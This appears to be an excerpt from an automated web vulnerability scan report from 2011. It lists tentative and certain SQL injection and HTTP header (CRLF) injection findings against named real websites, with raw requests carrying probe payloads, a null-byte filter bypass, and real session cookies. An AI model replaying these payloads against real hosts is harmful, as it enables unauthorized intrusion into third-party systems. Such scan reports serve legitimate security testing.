GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1 Host: shop.winamp.com Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000''
Response 2
HTTP/1.1 302 Moved Temporarily Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate, max-age=0, private Expires: Wed, 31 Dec 1969 23:59:59 GMT Location: http://shop.winamp.com:80/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage Content-Type: text/plain Connection: Keep-Alive Keep-Alive: timeout=45, max=999 Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=24330695573,0) Content-Length: 0 Date: Sun, 27 Feb 2011 17:47:40 GMT P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb02@dc1app59
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /rsrc.php/v1/yF/r'%20and%201%3d1--%20/QsQtRaU6mGT.css HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 7 Content-Type: text/html; charset=utf-8 X-Bad-Checksum: yF X-Powered-By: HPHP X-FB-Server: 10.138.64.184 Vary: Accept-Encoding Cache-Control: public, max-age=86400 Expires: Sun, 27 Feb 2011 23:10:57 GMT Date: Sat, 26 Feb 2011 23:10:57 GMT Connection: close
/*bcs*/
Request 2
GET /rsrc.php/v1/yF/r'%20and%201%3d2--%20/QsQtRaU6mGT.css HTTP/1.1 Host: static.ak.fbcdn.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.25. http://www.companypond.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.companypond.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /?1%00'=1 HTTP/1.1 Host: www.companypond.com Proxy-Connection: keep-alive Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:16 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: symfony=fa03e4bec9c60463fc37a80107a29a5b; path=/ X-Ua-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 73454
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs"> <head> <meta htt ...[SNIP]... Marketing Company based in Morristown, NJ with offices in Miami, FL. Our primary focus is helping small to medium sized businesses achieve online marketing success. Our clients come to Optimum7 after failing to achieve their marketing objectives online and... <a href="/optimum7" title="Profile for optimum7"> ...[SNIP]...
Request 2
GET /?1%00''=1 HTTP/1.1 Host: www.companypond.com Proxy-Connection: keep-alive Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 16:52:18 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0 X-Powered-By: PHP/5.2.6-1+lenny9 Set-Cookie: symfony=fdc0940037a69faf36c2ec348d2ba8d4; path=/ X-Ua-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 66519
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs"> <head> <meta htt ...[SNIP]...
The 129733 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 129733 parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /r.cgi?129733' HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 502 Bad Gateway Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:38 GMT Content-Type: text/html Connection: close Content-Length: 575
<html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx/0.8.53</center> </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> ...[SNIP]...
Request 2
GET /r.cgi?129733'' HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.27. http://www.dreamhost.com/r.cgi [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.dreamhost.com
Path: /r.cgi
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /r.cgi?1'=1 HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1 (redirected)
HTTP/1.1 502 Bad Gateway Server: nginx/0.8.53 Date: Sat, 26 Feb 2011 23:19:36 GMT Content-Type: text/html Connection: close Content-Length: 575
<html> <head><title>502 Bad Gateway</title></head> <body bgcolor="white"> <center><h1>502 Bad Gateway</h1></center> <hr><center>nginx/0.8.53</center> </body> </html> <!-- a padding to disable MSIE and Chrome friendly error page --> ...[SNIP]...
Request 2
GET /r.cgi?1''=1 HTTP/1.1 Host: www.dreamhost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /Portfolio/Trades-and-Exhibits/id-24'/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:56 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14497
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
<script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /Portfolio/Trades-and-Exhibits/id-25'/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:03 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14497
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
<script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /Portfolio/Trades-and-Exhibits/id-7'/page-1/ HTTP/1.1 Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;
Response
HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:51 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14496
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title>
<script type="text/javascript" language="javascript ...[SNIP]... </b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b> ...[SNIP]...
2. HTTP header injection
There are 9 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
The value of REST URL parameter 1 is copied into the Location response header. The payload 2de58%0d%0a6d24920450 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2de58%0d%0a6d24920450/N2998.159462.7724395940621/B4924654.4;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F679707%2F0%2F225%2FAdId%3D1200168%3BBnId%3D3%3Bitime%3D828708808%3Bkvpg%3Dwinamp%2Fskin%2Fslick-redux%2F222084%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93166279%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828708808? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.winamp.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 62182%0d%0a5ce3b6d291b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62182%0d%0a5ce3b6d291b/N2998.159462.7724395940621/B5077405.10;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F851061%2F0%2F225%2FAdId%3D1312688%3BBnId%3D3%3Bitime%3D828694819%3Bkvpg%3Dwinamp%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93302596%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828694819? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.winamp.com/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 51ad3%0d%0aeafac43fb55 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=51ad3%0d%0aeafac43fb55; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g
The value of the Site2pstoreToken request parameter is copied into the Location response header. The payload 21d1d%0d%0adea71b54e71 was submitted in the Site2pstoreToken parameter. This caused a response containing an injected HTTP header.
Request
GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~ ...[SNIP]... d1d%0d%0adea71b54e71 HTTP/1.1 Host: login.oracle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ORASSO_AUTH_HINT=v1.0~20110227072629; s_cc=true; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; s_nr=1298762800321; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull;
<HTML><HEAD><TITLE>Redirect to https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8 ...[SNIP]...
The value of the N cookie is copied into the Set-Cookie response header. The payload bf012%0d%0af7b9b665bf was submitted in the N cookie. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js?cmd=ADN&si=18288&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1 Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302bf012%0d%0af7b9b665bf; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 02:35:33 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Sun, 27 Feb 2011 02:50:33 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:35:33 GMT; domain=.at.atwola.com Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378933; path=/; expires=Sun, 06-Mar-11 02:35:33 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1298774133^1298775933|18288^1298774133^1298775933; path=/; expires=Sun, 27-Feb-11 03:05:33 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:35:33 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302bf012 f7b9b665bf,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=.at.atwola.com ntCoent-Length: 176 Content-Type: application/x-javascript Content-Length: 176
var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190'; ANRTXR();
The value of the si request parameter is copied into the Set-Cookie response header. The payload 8ecf0%0d%0a6420ebe94a was submitted in the si parameter. This caused a response containing an injected HTTP header.
Request
GET /rtx/r.js?cmd=ADN&si=8ecf0%0d%0a6420ebe94a&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1 Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 02:33:28 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Cache-Control: max-age=900 Expires: Sun, 27 Feb 2011 02:48:28 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:33:28 GMT; domain=.at.atwola.com Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378808; path=/; expires=Sun, 06-Mar-11 02:33:28 GMT; domain=tacoda.at.atwola.com Set-Cookie: Tsid=0^1298774008^1298775808|8ecf0 6420ebe94a^1298774008^1298775808; path=/; expires=Sun, 27-Feb-11 03:03:28 GMT; domain=tacoda.at.atwola.com Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:33:28 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=tacoda.at.atwola.com Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:33:28 GMT; path=/; domain=.at.atwola.com Cteonnt-Length: 176 Content-Type: application/x-javascript Content-Length: 176
var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16lsqii1n1a3cr'; var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190'; ANRTXR();
2.7. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1225394
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f335d%0d%0a6c92f1d82cf was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
